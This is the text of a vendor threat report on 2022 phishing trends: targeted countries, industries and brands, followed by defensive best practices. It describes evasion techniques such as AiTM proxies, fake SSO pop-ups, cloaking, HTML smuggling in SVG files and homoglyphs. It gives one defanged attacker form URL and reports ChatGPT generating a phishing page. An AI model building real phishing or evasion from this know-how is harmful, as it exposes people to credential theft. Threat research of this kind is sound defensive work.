Zscaler ThreatLabz 2023 Phishing Report

Zscaler ThreatLabz
2023 Phishing Report

© 2023 Zscaler, Inc. All rights reserved.

Contents
Executive Summary 3

Zscaler ThreatLabz 2023 Phishing Report

Key Findings 4
Top Phishing Targets in 2022 5
Evolving Phishing Trends 9
Vishing Attacks 9
Recruitment Scams 12
Adversary-in-the-Middle (AiTM) Phishing Attacks 14
Browser-in-the-Browser (BiTB) Phishing Attacks 15
Using Legitimate Services to Host Phishing Websites 16
Phishing Using the InterPlanetary File System (IPFS) 17
Using WebSockets to Exfil Fingerprinted Data 18
Using Web-Based Form Services to Collect Credentials 20
Phishing Using HTML Smuggling and SVG Files 21
Phishing Tools and Techniques 22
2024 Predictions 25
Improve Your Phishing Defenses 26
Best Practices: Security Awareness Training 27
Best Practices: Security Controls 28
Best Practices: How to Identify a Phishing Page 29
How the Zscaler Zero Trust ExchangeTM Can Mitigate Phishing Attacks 31
Related Zscaler Products 32
About ThreatLabz 33
About Zscaler 34
APPENDIX
Categorizing Phishing Attacks 35
Categorizing Phishing Attacks 35
Top Phishing Scams 38

© 2023 Zscaler, Inc. All rights reserved.

2
Executive Summary

Phishing scams are a growing threat, and

cybercriminals’ methods are becoming increasingly
sophisticated, making them harder to detect
and block. This report will help you recognize the social engineering tactics
and sophisticated coding used in phishing attacks, so you can
Analyzing 280 billion daily transactions and 8 billion daily blocked
prevent costly data breaches. Read on for an in-depth look at
attacks over the course of 2022, the Zscaler ThreatLabz team
the latest phishing trends and observations the ThreatLabz team
saw a 47.2% surge in phishing attempts compared to 2021—an
collected throughout the past year, and get best practices for
upward trend that’s expected to continue in 2023.
safeguarding your organization against ever-evolving phishing
The increased prevalence of phishing kits sourced from black techniques.
markets and chatbot AI tools like ChatGPT has seen attackers
quickly develop more targeted phishing campaigns. This improved
targeting has simplified the process of manipulating users into
taking actions that compromise their security credentials, leaving
them and their organizations vulnerable.

With the rise of AI and PaaS offerings, it’s easier than ever for
cybercriminals to compromise institutions and access sensitive
business, personal, and financial data for extortion. Although many
of today’s organizations have robust cybersecurity infrastructures,
they must re-examine those infrastructures in light of today’s
trends and consider taking a zero trust approach.

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 3
Key Findings in 2022

Phishing attacks rose 47.2% in 2022 AI tools have significantly contributed

compared to 2021. to the growth of phishing, reducing the
technical barriers to entry for criminals and saving
Microsoft brands, including OneDrive them time and resources.
and SharePoint, along with crypto exchange
Binance and illegal streaming services, were targeted Attackers are evolving beyond SMS
the most in 2022. phishing (SMiShing) to using voicemail-
related phishing (Vishing) to lure victims into opening
The United States, the United
malicious attachments.
Kingdom, the Netherlands, Russia,
and Canada were the top five most
Sophisticated Adversary-in-Middle
targeted countries.
(AiTM) attacks are helping attackers bypass
Education was the most targeted multifactor authentication (MFA) security measures.
industry with attacks increasing by 576%, while
last year’s top target, retail and wholesale, dropped by Recruitment scams targeting job
67%. seekers are becoming more common.

COVID-themed brand attacks accounted

for 7.2% of phishing scams in 2021, while they
dropped to just 3.7% in 2022.

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 4
Top Phishing Targets in 2022
Zscaler ThreatLabz analyzed data from across countries, industries, The reduction in phishing attacks targeting Singapore may be due to
brands, and platforms to understand the most prevalent targets for its government’s increased cybersecurity efforts, including initiatives
phishing attacks in 2022. by the country’s Cyber Security Agency (CSA). This agency provides
guidelines and advice to individuals and businesses on how to
2022 Phishing Attempts by Country protect themselves from cyberthreats and, alongside the Personal
The top 10 countries targeted for phishing scams in the last Data Protection Commission (PDPC), enforces data protection laws
year were: and regulations.

1. United States
2. United Kingdom
3. Netherlands
4. Russia
5. Canada
6. Singapore
7. Germany
8. France
9. Japan
10. China
The US is once again the most targeted country for phishing
attacks, a position it has always held. Our research indicates that
more than 65% of all phishing attempts occurred in the US—an
increase from last year’s 60%. The UK experienced a 269% rise in
phishing attacks.

Several countries saw phishing attempts increase in 2022, including

Canada, which saw a staggering 718% increase. Some ThreatLabz
Figure 1: Phishing attacks by country in 2022
experts attribute this spike to the adjacent increase in targets in
education. Russia saw a targeting increase of 198%, and Japan 92%.
However, Hungary witnessed a significant 90% decline in phishing
attacks, and Singapore’s targeting total went down by almost 48%.

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 5
 Top Phishing Targets in 2022

2022 Phishing Attempts by Industry

The education industry experienced a 576% increase in phishing the COVID-19 pandemic resumed their healthcare treatments in
attempts in 2022, which propelled it from the eighth most- 2022, logging in to their online accounts and potentially interacting
targeted sector to the first, surpassing last year’s most-targeted with phishing attackers impersonating healthcare organizations.
industry, retail/wholesale. Phishing perpetrators likely capitalized Moreover, ransomware attackers are leveraging more phishing
on the processes for student loan repayment and debt relief tactics to compromise healthcare organizations’ data.
applications that were filed last year and exploited remote learning
However, there was some respite from phishing attacks in 2022,
vulnerabilities. Finance and insurance also saw an increase in
with retail and wholesale experiencing a drop of 67% and services
phishing targets by a factor of 273% in 2022.
witnessing a decline of 38%. The decline in attacks on retail and
Phishing attempts in the healthcare industry also increased wholesale is likely due to a downshift in consumer behavior after
exponentially, from just under 31 million to over 114 million. Patients heavy online shopping and spending on goods in 2021.
who deferred routine medical maintenance during the initial year of

Figure 2: Phishing attacks by industry in 2022

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 6
 Top Phishing Targets in 2022

Most Imitated Brands in 2022 Phishing Attacks

Phishing attackers often exploit consumer P2P companies. Illegal streaming sites The 20 most imitated brands, products, and
trends by impersonating popular brands accounted for 13.6% of attacks, with spikes services in 2022 phishing attacks are:
to deceive vulnerable consumers. The during significant sporting events such
1. Microsoft 11. Google
most frequently targeted brand categories as the FIFA World Cup in November and
2. OneDrive 12. Telegram
include productivity tools, cryptocurrency December of 2022.
3. Binance 13. Adobe
sites, illegal streaming sites, social media
While COVID-themed attacks are still 4. Illegal streaming sites 14. DHL
platforms and messaging services, financial
prevalent, they’re on the decline. In 2021, 5. Sharepoint 15. Amazon
institutions, government sites, and logistics
COVID-themed brand attacks accounted for 6. COVID-19 relief 16. American Express
services.
7.2% of phishing scams, and they dropped 7. Government 17. WhatsApp
Microsoft was once again the most imitated to just 3.7% in 2022.
8. Netflix 18. Roblox
brand of the year, accounting for just
9. Facebook 19. Paypal
under 31% of attacks. Its OneDrive brand
10. Microsoft 365 20. DocuSign
accounted for another 17%, SharePoint
nearly 4%, and Microsoft 365 another
1.7%. In 2022, Zscaler found that attackers Imitation of Brand Names
increasingly used OneNote, which can
Telegram
be integrated with OneDrive and other 1.3%
Microsoft products, to deliver malware via Google
1.3%
Microsoft
phishing emails. Previously, threat actors Office365
1.7% 30.8%
targeted users with malicious macro- Facebook
1.8%
enabled documents, but in July 2022, Netflix
Microsoft disabled macros by default on 2.1%
Government
all Microsoft 365 (Office) applications, 2.8%
Covid-19
making the approach more unreliable for 3.7%
distributing malware. SharePoint
3.8%
Illegal Streaming
Cryptocurrency exchange Binance 5.0%
OneDrive
accounted for 17% of imitated brand 17.4%
Binance
attacks, with phishers posing as fake 17.4%
customer representatives from banks or
Figure 3: Brands most imitated in phishing attacks

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 7
 Top Phishing Targets in 2022

2022 Top Referring Domains

Attackers often use trusted domains to Top 20 Referring Domains Used in Phishing Attacks
manipulate victims, redirecting them
to phishing websites. They may buy principal.com
0.9%
advertisements on media outlets or search myftp.biz
0.9%
platforms like Google and Bing. They elonshib.net
0.9%
may also post in corporate forums and doubleclick.net
1.0%
marketplaces such as Walmart and Amazon hesgoal.com qumucloud.com
1.1% 27.0%
or abuse sharing sites/services such as holdingsglobaloverviewmarketcap.com
1.3%
Evernote, Dropbox, and GitHub. finanznachrichten.de
1.4%
google.com
We analyzed referring domains to 2.1%
determine which ones attackers exploit framer.com
3.1%
the most. In 2022, these included video dow.com
3.5%
streaming sites, crypto exchanges and other gutefrage.net
financial sites, website and form-builders, 3.6%

mhtestd.gov.zw
sites that host user-generated content,
5.0%
search engines, and more. typeform.com
vimeo.com
5.7%
16.3%
The top 20 referring domains in 2022 were: googlesyndication.com
6.3%
bittrex-global-email-i.com
1. qumucloud.com 11. google.com
6.8% bittrex-appemail.com
2. vimeo.com 12. finanznachrichten.de 11.6%

3. bittrex-appemail.com 13. holldingsglobaloverview Figure 4: Most common referring domains used in 2022 phishing attacks
marketcap.com
4. bittrex-global-email-i.
com 14. hesgoal.com
5. googlesyndication.com 15. doubleclick.net
6. typeform.com 16. elonshib.net
7. mhtestd.gov.zw 17. myftp.biz
8. gutefrage.net 18. principal.com
9. dow.com 19. marathonbet.ru
10. framer.com 20. baidu.com

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 8
 Evolving Phishing Trends

Autonomous System Attacks in 2022

An autonomous system (AS) is a network or group of networks Our analysis showed that in 2022, 39% of phishing attacks
with a single routing policy. Each AS has a unique numeric were using hosting sites (down from 50.6% in 2021), 53%
identifier, known as an ASN. As part of this analysis, the Zscaler were on ISPs (up from 39.2% in 2021), and 8% were on
ThreatLabz team reviewed the ASNs that were responsible for business domains.
hosting phishing infrastructure.

Top ASN Distribution Types

business
8.0%

hosting
39.0%

isp
53.0%

Figure 5: ASNs for phishing infrastructure

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 9
Evolving Phishing Trends
Each year, threat actors employ more sophisticated tactics and remains ahead of attacks, staying informed of the latest threat
increasingly advanced approaches to execute their phishing trends is essential. The following are the key takeaways from
scams. To ensure your organization is prepared and your team the updated phishing trends observed in 2022.

Vishing Attacks
Vishing attacks, or voicemail-themed phishing campaigns, lure The .html file contains obfuscated JavaScript:
victims into opening malicious attachments. In mid-2022, threat
actors targeted users from various US-based organizations with
malicious voicemail-notification-themed emails to steal their
Microsoft 365 and Outlook credentials.

We also observed phishing campaigns with voicemail-themed

email attachments like this: Figure 7: Vishing campaign email code with hidden JavaScript

In deobfuscating the email code, you can see that if a user were to open
the file, it would redirect them to an attacker-controlled server:

Figure 8: Vishing campaign email code with hidden JavaScript revealed

Figure 6: Vishing campaign email

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 10
 Evolving Phishing Trends

This leads to a Microsoft phishing page: To avoid falling into attackers’ traps, it is crucial to
educate employees to communicate with each other
only through official channels and to stay vigilant about
such scams.

Figure 9: Vishing campaign landing page

ThreatLabz also uncovered a voice-call scam wherein

a threat actor targets a corporate employee by
impersonating a manager. Initially, the victim receives
an impersonated phone call with a prerecorded “hello”
message, and then the call terminates. Subsequently,
the victim receives a message from the scammer
indicating the manager is having network connectivity
issues and requesting communication to continue
through messaging. The scammer then attempts
to coax the victim into divulging corporate account
information or transferring funds. Figure 10: Vishing messaging

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 11
 Evolving Phishing Trends

Recruitment Scams
During 2022, ThreatLabz witnessed an increase in targeted job
seekers utilizing a range of employment scams. These scams
used fabricated job postings, websites or portals, and forms to
lure individuals seeking employment.

Once the victim applied for the job, the attacker would
communicate with them and request a Skype interview wherein
the attacker would impersonate an HR representative.

Figure 11: Fake LinkedIn advertisement with a phishing URL

Here, the attacker posted a fake LinkedIn advertisement with a

phishing URL. Visiting the fake URL would let potential victims
apply for the job.

Figure 12: Fake recruitment email

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 12
 Evolving Phishing Trends

In examining the source code, you can see code used for exfiltrating credit card data.

Figure 13: Fake recruitment email source code

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 13
 Evolving Phishing Trends

Adversary-in-the-Middle (AiTM) Phishing Attacks

Learn more about Adversary-in-the-Middle (AiTM) The original subdomain (in green), the original domain name (in
phishing attacks. blue, minus the TLD), and a unique generated ID (in pink) are
joined together with dashes and become a subdomain under the
The ThreatLabz team discovered a new strain of a large-scale
phishing site’s domain (in orange).
phishing campaign that uses AiTM techniques along with
several evasion tactics. Traditional phishing websites that collect We detected this when some of the requests were passed with
user credentials never complete the authentication process with incorrect modifications to the victim as seen in figure 16.
the actual mail provider’s server. If the user has enabled MFA, it
prevents the attacker from logging in to the account with only
the stolen credentials. To bypass MFA, attackers may use AiTM
phishing attacks.

Figure 14 shows a code snippet of a phishing page served by an

AiTM phishing server. Figure 16: Incorrect modifications passed to phishing victim

This resulted in a leak of the attacker-controlled server address,

as shown in figure 17.

Figure 14: Phishing page code served by AiTM phishing server

The AiTM malicious proxy server modifies the URLs in a

legitimate destination page with attacker-controlled URLs
Figure 17: Attacker-controlled server address revealed
(see figure 15) and acts as a relay between the victim and the
destination server.

Figure 15: Attacker-controlled URLs modified by AiTM proxy server

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 14
 Evolving Phishing Trends

Browser-in-the-Browser (BiTB) Phishing Attacks

BiTB phishing attacks also saw increased use in 2022. They Figure 18 shows an example of a BiTB attack using a fake
simulate a login page window within a main phishing page that SSO window, generated using HTML, to target Steam, a
leads the intended target to believe they need to enter their popular digital gaming platform.
single sign-on (SSO) credentials to continue using the website.

Attackers use a combination of basic HTML/CSS and inline

frame (iframe) to craft a fake pop-up window that simulates the
user’s typical SSO pop-up window. It can be almost impossible
for a user to distinguish a genuine pop-up from a well-designed
phishing fake.

Figure 18: BiTB or “picture-in-picture” attack

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 15
 Evolving Phishing Trends

Using Legitimate Services to Host Phishing Websites

The ThreatLabz team also observed attackers using legitimate
hosting services to host phishing sites. Some of these sites
included free hosting providers such as 00webhostapp.com, file
sharing services such as transfer.sh, cloud service providers such
as amazonaws.com, and URL shortening using services such as
linkedin.com.

In 2022, the team observed attackers using Dynamic DNS

services that allow users to map a domain name to a changing
IP address. Users primarily leverage these services for remote
access or hosting websites on home networks.

Figure 20: Dynamic DNS subdomains for phishing page hosting

(example two)

Attackers can also use Dynamic DNS services to host phishing

websites on compromised computers or servers without fixed
IP addresses.

Figure 19: Dynamic DNS subdomains for phishing page hosting (example one)

Figure 21: T&T phishing hosted using dynamic DNS

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 16
 Evolving Phishing Trends

Phishing Using the InterPlanetary File System (IPFS)

IPFS is a distributed peer-to-peer file system that allows We also observed attackers using Google Translate to make their
users to store and share files on a decentralized network of URLs appear legitimate.
computers. Compared to traditional centralized file systems, it
provides a more secure, resilient, and efficient way of storing
and distributing files.

In IPFS, files are divided into smaller chunks and distributed

across multiple nodes in a network, making it more difficult for
a single point of failure to compromise the entire system. Figure
22 shows what IPFS phishing looks like.

Figure 23: IPFS phishing example leveraging Google Translate

As shown in figure 23, attackers used Google Translate on an

IPFS-hosted phishing site, and then used the page to phish
DocuSign credentials.

Figure 22: IPFS phishing example)

Because of its peer-to-peer construction, it’s much more

difficult to remove an IPFS-hosted phishing page than one
hosted using a more traditional method.

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 17
 Evolving Phishing Trends

Using WebSockets to Exfiltrate Fingerprinted Data

In the Zscaler ThreatLabz 2022 Phishing Report, we discussed 4. The JavaScript code automatically refreshes the page
phishing kits and open source phishing frameworks. These kits with the cookie
and frameworks package up and commoditize the required 5. The user is redirected to the phishing page if the cookies
tools to quickly launch hundreds or thousands of convincing and
pass the check
effective phishing pages—even if the attacker or attackers have
little technical skill.
The fingerprinting JavaScript is based on this open-source
Some of these phishing kits have a feature called “cloaking,” a project on GitHub.
technique that lets phishers hide an actual phishing webpage
from security researchers and scanners while still serving it to
their victims. The phishing kit will filter connections for each
visitor based on IP address, hostname keywords, user agent,
and more. Based on the match, it will serve either a benign page
or a phishing page, avoiding detection by security researchers
and anti-phishing tools that scan the internet for malicious
content.

This year, we observed a new feature in client fingerprinting.

Here is what happens when a visitor lands on—and is
fingerprinted by—a phishing page:

1. The user surfs the phishing page

2. The server returns a JavaScript to fingerprint the client, and
JavaScript uploads the fingerprint via WebSocket connection
3. The server generates a cookie based on the fingerprint and
sends the cookie back via WebSocket

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 18
 Evolving Phishing Trends

This technique can be disrupted by monitoring WebSocket

communication and filtering fingerprint data. The phishing
kit can set up command-and-control (C2) communication to
receive commands from phishing servers via WebSocket via a
technique referred to as heartbeat communication, where the
attacker sends and receives data back and forth from the
victim’s device.

Figure 25: Example of heartbeat communication

Figure 24: Fingerprint data of a machine

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 19
 Evolving Phishing Trends

Using Web-Based Form Services to Collect Credentials

We also observed attackers abusing services that help users The “action” in the form is “https://submit-form[.]com/Qz1kGknr”.
collect information via forms. For example, FormSubmit is a
web-based service that provides a simple way to set up and
manage HTML forms for websites. Organizations can use it
to create custom forms with various input fields, such as text
boxes, checkboxes, radio buttons, dropdown lists, and file
uploads, and then submit the form data to a specified email
address or webhook URL.

The example in figure 26 demonstrates how threat actors can

abuse form creation services to collect credentials without
setting up servers.

Figure 27: How the attacker leverages the form service to intercept information

Figure 26: Form example

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 20
 Evolving Phishing Trends

Phishing Using HTML Smuggling and SVG Files

HTML smuggling is a technique that allows attackers to bypass

network security controls by embedding malicious code within
apparently benign HTML and then delivering malicious payloads
to a target system. Detection schemes often scan and detect
JavaScript, so threat actors turn to HTML smuggling to deliver
various types of malware.

Attackers often move HTML smuggling code into Scalable

Vector Graphics (SVG), a vector graphics format based on XML
used to create two-dimensional graphics that can be scaled
without losing resolution. They can edit SVG files with text
editors and graphic software.

Attackers can use JavaScript to manipulate the SVG elements

and attributes to create different animations, such as moving
objects, changing colors, and creating transitions. With
JavaScript, SVG animations can be interactive, allowing users to
interact with the graphics and trigger different animations.

Detection solutions don’t typically check JavaScript inside SVG,

making it an attractive option for attackers.

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 21
 Evolving Phishing Trends

Phishing Tools and Techniques

There are several standalone applications or browser extensions example, the first iframe is used to collect a username
available online that threat actors use to copy a legitimate website (figure 28):
and modify the data exfiltration code to steal data. Here are some
examples:
• HTTrack, a widely used standalone application
• singlefile, a Google Chrome extension
• Webscrapbook, an open source browser extension
• Save Page WE, a Google Chrome extension
Figure 28: Username-collecting iframe

The second iframe is used to collect a password (figure 29):

Phishing Using iframes
An iframe is an HTML element that allows web developers to
embed another HTML document within the current web page.
It creates a “frame within a frame” wherein the content of the
embedded document displays in a rectangular box on the current
page. When threat actors embed phishing content in an iframe,
Figure 29: Password-collecting iframe
they may evade detection.
Finally, the phishing page combines the two iframes
An iframe can be used for phishing in a few different ways:
(figure 30):
1. Nested iframe
2. iframe as background
3. Iframe as front, like BiTB

To add to these, we expect “iframes as components” to begin to

appear, too. In this method, several iframes can be combined to
generate a phishing page, with an iframe as part of the page. For

Figure 30: Phishing page with combined iframes

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 22
 Evolving Phishing Trends

WebAssembly Phishing
WebAssembly is a binary instruction format for a virtual machine decimal, hexadecimal). When phishing attactors represent an IP
that runs in modern web browsers. It provides a portable, low- address in a nonstandard way, it may evade detection, but this can
level bytecode format that can be executed at near-native speed, be mitigated by normalizing IP addresses.
making it well-suited to running performance-critical applications
on the web. Phishing Using “Hash in URL”
WebAssembly addresses the limitations of JavaScript as a
The “hash” in a URL refers to the portion of the URL that comes
performance language for web applications; its code can be written
after the “#” symbol. Also known as the fragment identifier, it
in various languages, such as C++, Rust, and Go, and then compiled
identifies a specific section within a web page, such as a section
to the WebAssembly bytecode format.
heading or a paragraph, and allows a user to navigate to that
section directly by clicking on a link or bookmark.
Phishing Based on Geographic Region
The content after the “#” symbol is not sent to the server, so
Threat actors wanting to target users who are in specific regions or changes to the hash do not trigger a page refresh. This feature is
speak specific languages may turn to third-party API and specific often used in single-page applications and dynamic web content.
services to identify those audiences.
Phishing attackers have found two new ways to exploit this:
Geo Targetly is a service that allows users to personalize their 1. Representing user information with the hash.
website content based on its visitors’ geographic location. To
• Email addresses are most common. When the
determine display content, they can create custom rules based on
login page is displayed, the user’s email address is
factors like IP addresses, language settings, and time zones.
automatically filled in to deceive the user.
Unsurprisingly, attackers use this service as a cloaking technique
when phishing. 2. Generating specific phishing pages based on the hash, which
can distinguish users.

Using Punycode or a Nonstandard IP Address in

URLs to Avoid Detection
An IP address is simply a 32-bit number that can be represented
using different quantities of digits. The standard quantity is four
digits, but one-, two-, or three-digit IP addresses also exist, and
each digit can be represented using a different base (binary, octal,

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 23
 Evolving Phishing Trends

AI and Phishing
Recent AI technology advances like ChatGPT make it easier for
threat actors to develop malicious code, generate business email
compromise (BEC) attacks, create polymorphic malware, and more.
We attempted to generate a phishing login page using ChatGPT,
and after just three simple interactions, the tool generated this
webpage:

Figure 31: ChatGPT-generated phishing page

With a little more effort, an attacker could add background and

modify it to look like a genuine login page.

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 24
2024 Predictions

1. AI attacks will see more frequent use as

threat actors discover new applications for these services.
4. MFA bombing and AiTM attacks will
increase as attackers find ways to bypass MFA
Expect to see more sophisticated scams across different security measures. MFA bombs overwhelm victims with
communication channels, such as email, SMS, and authentication requests, while AiTM attacks intercept the
websites. Also, prepare for a surge in phishing attempts victim’s session after they have successfully authenticated
as attackers leverage AI to launch more coordinated and with MFA. Attackers will use advanced techniques,
effective attacks on larger groups of people. including AI, to predict and generate verification codes
or identify patterns in user behavior to exploit for access.

2.
To protect against these attacks, it’s important to use
Phishing-as-a-service offerings will
strong passwords, enable two-factor authentication, and
continue to evolve, with providers offering monitor accounts for suspicious activity.
customized phishing templates, access to larger
databases of potential victims, and more advanced
social engineering techniques. Providers may also offer
additional services such as malware installation, hosting, 5. Personalized attacks will become
more challenging to detect as attackers
and analytics. What’s more, these providers will compete
develop advanced reconnaissance techniques to gather
to offer the best value with affordable pricing models
information about potential victims. This information will
and 24/7 customer support. This may lead to an increase
be used to create tailored phishing emails that appear
in small-scale phishing attacks, so it’s crucial to stay
more legitimate and convincing, increasing their likelihood
informed about the latest phishing threats and trends.
of success. As attackers become more sophisticated in
their use of personalization, it will become increasingly

3.
difficult for users to identify and avoid phishing attacks.
Mobile attacks will become more
prevalent as attackers focus on exploiting our reliance
on these devices. Attackers will develop more mobile-
friendly content, such as optimized apps, websites, and
malware, including spyware and remote access trojans.
They will also find new ways to extort victims for
financial gain.

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 25
Improve Your Phishing Defenses

Industry statistics reveal that the average organization receives you can’t eliminate the risk of phishing threats completely, you can
dozens of phishing emails per day, with financial losses snowballing lower your organization’s chances of falling victim to them.
as losses incurred from malware and ransomware attacks drive up
the average costs of landed phishing attacks year over year. Facing The basics for mitigating the risk of phishing attacks:
all the threats outlined in this report is a difficult task, and while

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 26
 Improve Your Phishing Defences

Best Practices: Security Awareness Training

ThreatLabz further recommends that your awareness training follow
the guidance from the US Cybersecurity Infrastructure & Security
Phishing campaigns have high success rates because
Agency (CISA) that advises end users to be on the lookout for the
they attack users, and it takes only one distracted
employee to make an error in judgment and take the following indicators:
bait. A 2020 study by Stanford University reported • Suspicious sender addresses. A sender’s email address may
that nearly 88% of data breaches were caused by imitate a legitimate business. Cybercriminals often use addresses
human error. The report also revealed that young male that closely resemble those from reputable companies by altering
employees are most vulnerable to phishing scams and or omitting a few characters.
that distraction is the leading cause of error across all
• Generic greetings and signatures. Both a generic greeting—
demographics.
such as “Dear Valued Customer” or “Sir/Ma’am”—and a lack of
This is why end user awareness training is critical to contact information in the signature block are strong indicators of
preventing security breaches—and once a year is a phishing email. A trusted organization will normally address you
not enough. Everyone in your organization must be by name and provide their contact information.
educated on how victims fall prey to phishing threats • Spoofed hyperlinks and websites. If you hover your cursor
and be wary of giving out information or clicking links over any links in the body of the email and the hover text
when dealing with untrusted emails, websites, text
doesn’t match, the link may be spoofed. Malicious websites
messages, applications, and phone calls.
may look identical to legitimate sites, but the URL may use a
Implementing continuous security awareness training spelling variation or a different domain (e.g., “.com” vs. “.net”).
and conducting regular phishing simulations are keys Additionally, cybercriminals may use a URL shortening service to
to developing a vigilant culture with strong phishing hide the true destination of the link.
awareness. These activities allow you to deliver timely • Spelling and layout. Poor grammar and sentence structure,
training to individuals that need extra support in misspellings, and inconsistent formatting are other indicators of a
identifying phishing attempts and modifying their risky possible phishing attempt. Reputable institutions have dedicated
behavior. personnel who produce, verify, and proofread customer
Another way to reduce the number of phishing correspondence.
incidents is to improve user reporting of suspected • Suspicious attachments. An unsolicited email requesting a
phishing emails, which can decrease the time it takes user download and open an attachment is a common delivery
for security teams to remove related threats from mechanism for malware. A cybercriminal may use a false sense
other inboxes. This can be done by providing a “Report of urgency or importance to help persuade a user to download or
phishing” button directly from the inbox. open an attachment without examining it first.

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 27
 Improve Your Phishing Defences

Best Practices: Security Controls

To account for the fact that employees and other end users will • Antivirus software. Endpoints should be protected with regularly
invariably fall victim to phishing attempts, security teams must updated antivirus to identify malicious files and prevent them
have protections in place to detect and mitigate damage. Key from being downloaded.
protections include: • Advanced threat protection. Antivirus can stop known threats,
• Email scanning. Email is by far the most common phishing but adversaries are capable of spinning up new, unknown
vector, so a cloud-based email scanning service that inspects malware variants that can evade signature-based detection
emails before they reach your perimeter—with real-time tools. Deploy an inline sandbox that can quarantine and analyze
protection against malicious links and domain name suspicious files, and browser isolation that abstracts potentially
spoofing—is crucial. malicious web content without disrupting end user workflows.

• Reporting. Phishing attacks often target many end users in an • URL filtering. Limit your phishing risk with URL filtering that uses
organization to increase the chances of success. Enable end policy to manage access to the riskiest categories of web content,
users to report phishing attempts to block malicious senders such as newly registered domains.
and links as quickly as possible, ideally with a phishing reporting • Regular patching. Keep applications, operating systems, and
button built into users’ email clients. Implement a playbook to security tools up to date with the latest patches to reduce
investigate and respond to phishing incidents, including agency vulnerabilities, and ensure that you have the latest protections.
reporting to help the government fight scammers and stop • Zero trust architecture. As important as it is to have controls in
attacks against other organizations. place to prevent phishing, it is equally important to have ones
• Multifactor authentication. MFA remains one of the most that limit the damage from a successful attack. Employ granular
critical defenses against phishing. With MFA deployed, a segmentation, enforce least-privileged access, and continuously
password alone is not enough to compromise an account. monitor traffic to find threat actors who may have compromised
Authentication apps such as Okta Verify or Google your infrastructure.
Authenticator are particularly effective, providing additional • Threat intel feeds. These feeds integrate with your existing
defense against MiTM tactics that may intercept SMS security tools to provide automated context enrichment for
messages. enhanced detection and faster resolution of phishing threats.
• Encrypted traffic inspection. More than 95% of attacks use They also provide updated context on reported URLs; extracted
encrypted channels, which often are not inspected, making indicators of compromise (IOCs); and tactics, techniques,
it easy for even moderately sophisticated attackers to bypass and procedures (TTPs) for actionable decision-making and
security controls. Organizations must inspect all traffic, whether prioritization.
or not it’s encrypted, to prevent attackers from compromising
their systems.

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 28
 Improve Your Phishing Defences

Best Practices: How to Identify a Phishing Page

Phishing pages can be identified by indicators of common tactics The page has no title.
threat actors use to trick users and security engines, as well as by
shortcuts threat actors often take when generating new phishing
pages. The creation of new phishing sites spikes around holidays
and other isolated events. For example, during the pandemic,
the security industry witnessed attackers launching a trove of
fake COVID-19 websites that took advantage of victims by
impersonating health organizations as well as test kit and medical
supply ordering sites.

To detect the latest phishing threats, it is important to stay on

top of the latest research and ingest actionable intel with updated
indicators for use across your detection rules and response
workflows.

The following is an overview of various indicators you (and your

anti-phishing tools) should look out for:

The entire page is based on a single image. Attackers leverage

image-based phishing wherein the entire page is based on a
background image which is a copy of a legitimate webpage. The
only other component on the page is a web form to collect stolen
credentials. This is a very common technique used to target banks,
in particular.

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 29
 Improve Your Phishing Defences

The page has an empty anchor for critical links. Phishing pages
often use empty anchors for important pages like Help, FAQs, etc.,
when they copy content from legitimate pages.

The page contains obfuscated tags. Phishing operators may

obfuscate fields such as title, copyright, etc.

The page replaces key characters with “homoglyphs.”

Homoglyphs—characters that look similar to other characters—
are abused on phishing pages to avoid detection. This technique
The page has a self-signed certificate.
leverages similarities in characters belonging to different character
The page appears to be a generic webmail client. Phishing actors scripts to trick users as well as security engines looking to match
often use generic webmail pages for phishing mail credentials, ASCII patterns.
imitating sites like Webmail, Zimbra, etc.

The page is not encrypted. A login prompt on an “http” page is

suspicious and should be flagged.

The page has multiple redirects before landing on a login prompt.

The page contains HTML smuggling. With HTML smuggling,

attackers hide an encoded malicious JavaScript blob within an email
attachment, which is then assembled by the browser. This allows
them to bypass email filters. HTML smuggling in conjunction with a
login prompt is highly suspicious behavior.

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 30
How the Zscaler Zero Trust Exchange Can
Mitigate Phishing Attacks
User compromise is one of the most difficult security challenges
to defend against. Your organization must implement phishing
prevention controls as part of a broader zero trust strategy that
enables you to detect active breaches and minimize the damage
caused by a successful breach. The Zscaler Zero Trust Exchange™ is
built on a holistic zero trust architecture that helps stop phishing by:

